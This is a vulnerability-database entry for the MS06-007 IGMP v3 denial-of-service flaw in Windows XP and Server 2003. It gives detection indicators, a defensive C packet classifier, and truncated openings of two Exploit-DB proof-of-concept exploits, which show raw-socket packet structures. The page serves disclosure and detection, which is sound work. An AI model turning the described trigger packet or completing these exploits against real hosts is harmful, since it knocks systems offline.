CVE-2006-0021
Published 2006-02-14
Priority P346 · high · CVSS 2.0: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
EXPLOIT
EPSS: 62.88% (99.1th percentile)
Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote attackers to cause a denial of service (hang) via an IGMP packet with an invalid IP option, aka the "IGMP v3 DoS Vulnerability."
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
Detection & IOCs (extracted from sources)
- Detect IGMP packets with an invalid or oversized IP header length (IHL=7, indicating 28 bytes of IP header with malformed options) targeting Windows hosts; this is characteristic of the MS06-007 DoS trigger.
- The exploit sends a raw IGMP packet using SOCK_RAW/IPPROTO_RAW with IP_HDRINCL set (setsockopt IP option 2), which requires Administrator/root privileges on the sending host, so lateral movement or insider threat scenarios should be considered.
- Affected targets are Windows XP SP1/SP2 and Windows Server 2003 up to SP1; any IGMP packet with an invalid IP option field received by these systems can cause a hang (kernel-level DoS).
- The Windows Firewall must be disabled on the victim for the raw IGMP packet to be processed; environments with host-based firewalls enabled may not be vulnerable to remote exploitation.
- The Linux-based PoC (exploit 1603) requires the attacker to run as root to open a raw socket (SOCK_RAW/IPPROTO_RAW); the Windows-based PoC (exploit 1599) requires Administrator rights on the sending system.
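The first indicator above can be turned into a packet check. The following is an added example, not code from this page or from the exploit authors: `classify_igmp`, the verdict names and both sample packets are constructed for illustration, and it assumes legitimate IGMP carries either no IP options or only the 4-byte Router Alert option (type 0x94), so IHL is 5 or 6.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

enum verdict { NOT_IGMP, IGMP_OK, IGMP_BAD_OPTION, IGMP_LONG_HEADER, MALFORMED_IP };

/* Classify one raw IPv4 packet, starting at the IP header. */
enum verdict classify_igmp(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4) return MALFORMED_IP;
    size_t hlen = (size_t)(pkt[0] & 0x0F) * 4;      /* IHL counts 32-bit words */
    if (hlen < 20 || hlen > len) return MALFORMED_IP;
    if (pkt[9] != 2) return NOT_IGMP;               /* IP protocol 2 = IGMP */

    for (size_t i = 20; i < hlen; ) {               /* walk the IP options */
        uint8_t type = pkt[i];
        if (type == 0) break;                       /* End of Option List */
        if (type == 1) { i++; continue; }           /* No-Operation */
        if (i + 1 >= hlen) return IGMP_BAD_OPTION;  /* no room for a length byte */
        uint8_t olen = pkt[i + 1];
        if (olen < 2 || i + olen > hlen) return IGMP_BAD_OPTION;
        if (type != 0x94 || olen != 4) return IGMP_BAD_OPTION; /* not Router Alert */
        i += olen;
    }
    /* Assumption: legitimate IGMP carries no options or Router Alert only. */
    return hlen > 24 ? IGMP_LONG_HEADER : IGMP_OK;
}

/* Constructed samples (documentation addresses, checksums left zero). */
static const uint8_t SAMPLE_QUERY[] = {             /* IHL=6, Router Alert */
    0x46,0xC0,0x00,0x24, 0x00,0x01,0x00,0x00, 0x01,0x02,0x00,0x00,
    192,0,2,1, 224,0,0,1, 0x94,0x04,0x00,0x00,
    0x11,0x64,0x00,0x00, 0,0,0,0, 0x02,0x7D,0x00,0x00 };
static const uint8_t SAMPLE_IHL7[] = {              /* IHL=7, padded with NOPs */
    0x47,0xC0,0x00,0x24, 0x00,0x02,0x00,0x00, 0x01,0x02,0x00,0x00,
    192,0,2,1, 224,0,0,1, 0x94,0x04,0x00,0x00, 0x01,0x01,0x01,0x01,
    0x11,0x64,0x00,0x00, 0,0,0,0 };

int main(void)
{
    printf("query: %d\n", classify_igmp(SAMPLE_QUERY, sizeof SAMPLE_QUERY));
    printf("ihl7:  %d\n", classify_igmp(SAMPLE_IHL7, sizeof SAMPLE_IHL7));
    return 0;
}
```

Any verdict other than `IGMP_OK` or `NOT_IGMP` is worth alerting on or dropping at a perimeter filter in front of the affected Windows versions.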
No detection rules found.
Exploit-DB
Microsoft Windows XP/2003 - IGMP v3 Denial of Service (MS06-007) (2)
exploitdb·2006-03-22
---
```c
/* MS06-007 Denial of Service POC exploit
   created by Firestorm, based on zloSend.exe win32 exploit (http://www.securitylab.ru/poc/264136.php)
   Tested on Windows XP SP2 as victim (compiled/run on Fedora Core 4 x86)
   FOR EDUCATIONAL PURPOSE ONLY !!! */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
struct iphdr
{
    unsigned char ihl:4, version:4, tos;
    unsigned short tot_len, id, frag_off;
    unsigned char ttl, protocol;
    unsigned short check;
    unsigned int saddr, daddr;
    unsigned int options1;
    unsigned int options2;
};
struct igmpv3_query {
    unsigned char type;
    unsigned char code;
    unsigned short csum;
    unsigned int group;
    unsigned char qqic;
    unsigned char qrv:3,
                  suppress:1,
                  resv:4
```
Exploit-DB
Microsoft Windows XP/2003 - IGMP v3 Denial of Service (MS06-007) (1)
exploitdb·2006-03-21
---
```c
/*
   IGMP v3 DoS Exploit
   ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html
   ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx
   by Alexey Sintsov ([email protected])
   Req:
     Administrator rights on system
     Windows Firewall off (for sending RAW packets)
   Affected Products:
     Microsoft Corporation Windows XP All
     Microsoft Corporation Windows Server 2003 All
*/
#include
#include
#pragma comment(lib, "Ws2_32.lib")
typedef struct iphdr
{
    unsigned char verlen;           // IP version & length
    unsigned char tos;              // Type of service
    unsigned short total_len;       // Total length of the packet
    unsigned short ident;           // Unique identifier
    unsigned short frag_and_flags;  // Flags
    unsigned char ttl;              // Tim
```
No writeups or analysis indexed.
- http://secunia.com/advisories/18853
- http://securitytracker.com/id?1015629
- http://www.kb.cert.org/vuls/id/839284
- http://www.securiteam.com/exploits/5PP0T0KI0O.html
- http://www.securityfocus.com/archive/1/482658/30/4350/threaded
- http://www.securityfocus.com/bid/16645
- http://www.us-cert.gov/cas/techalerts/TA06-045A.html
- http://www.vupen.com/english/advisories/2006/0576
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-007
- https://exchange.xforce.ibmcloud.com/vulnerabilities/24489
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1310
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1425
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1647
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1662
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A678
- https://www.exploit-db.com/exploits/1599